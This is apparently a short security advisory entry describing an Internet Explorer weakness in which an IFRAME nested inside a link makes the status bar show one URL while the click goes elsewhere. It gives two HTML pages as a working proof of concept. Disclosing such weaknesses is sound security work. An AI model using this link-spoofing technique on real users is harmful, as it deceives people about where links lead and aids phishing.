Microsoft Internet Explorer IFRAME Status Bar URI Obfuscation Weakness

Microsoft Internet Explorer IFRAME Status Bar URI Obfuscation Weakness

The following example is available:

HTML code for page #1 called "btf.htm":

<a href="http://www.microsoft.com/">
<iframe src="./btf-spoofing.htm" frameborder="0" scrolling="no" width="70"
height="25" marginheight="0" marginwidth="0"></iframe>
</a>

HTML code for page #2 called "btf-spoofing.htm":

<a href="http://www.google.com/" target="_top">Click here</a>